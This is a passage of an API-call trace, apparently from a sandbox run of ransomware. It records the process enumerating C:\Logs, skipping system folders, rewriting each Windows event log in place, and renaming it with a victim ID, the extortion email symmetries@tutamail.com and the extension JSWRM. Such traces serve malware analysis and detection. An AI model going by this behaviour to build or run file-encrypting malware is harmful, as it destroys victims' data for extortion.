dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2=".") returned 1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="..") returned 1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="...") returned 1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="windows") returned -1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="recovery") returned -1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="perflogs") returned -1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.374] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.375] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="system volume information") returned -1 [0066.375] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="msocache") returned -1 [0066.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0066.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0066.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0066.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchWideChar=76, lpMultiByteStr=0x22c380, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 76 [0066.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0066.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0066.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0066.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0066.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchWideChar=76, lpMultiByteStr=0x22c3d8, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 76 [0066.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0066.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0066.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0066.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0066.375] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.376] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.376] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.376] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.382] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.382] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.382] CloseHandle (hObject=0x450) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0066.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0066.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0066.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0066.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0066.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.385] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0066.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0066.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0066.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0066.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0066.385] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0066.385] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2=".") returned 1 [0066.385] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="..") returned 1 [0066.385] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="...") returned 1 [0066.385] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="windows") returned -1 [0066.385] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="recovery") returned -1 [0066.386] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="perflogs") returned -1 [0066.386] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.386] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.386] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="system volume information") returned -1 [0066.386] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="msocache") returned -1 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0066.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TWinUI%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TWinUI%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x1f8638, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TWinUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0066.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TWinUI%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TWinUI%4Operational.evtx", cchWideChar=42, lpMultiByteStr=0x1f8328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TWinUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0066.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0066.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0066.386] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.386] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.386] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.386] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.392] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.392] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.392] CloseHandle (hObject=0x450) returned 1 [0066.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0066.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0066.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0066.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0066.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0066.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0066.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.395] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.395] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0066.395] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2=".") returned 1 [0066.395] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="..") returned 1 [0066.395] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="...") returned 1 [0066.395] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="windows") returned -1 [0066.395] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="recovery") returned -1 [0066.396] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="perflogs") returned -1 [0066.396] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.396] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.396] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="system volume information") returned -1 [0066.396] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="msocache") returned -1 [0066.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0066.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-User Profile Service%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0066.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0066.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-User Profile Service%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x20e268, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-User Profile Service%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0066.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0066.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0066.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-User Profile Service%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0066.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0066.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-User Profile Service%4Operational.evtx", cchWideChar=56, lpMultiByteStr=0x20e418, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-User Profile Service%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0066.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0066.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0066.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0066.397] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.397] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.397] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.397] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.403] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.403] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.403] CloseHandle (hObject=0x450) returned 1 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0066.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0066.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0066.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0066.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0066.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.469] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-User Profile 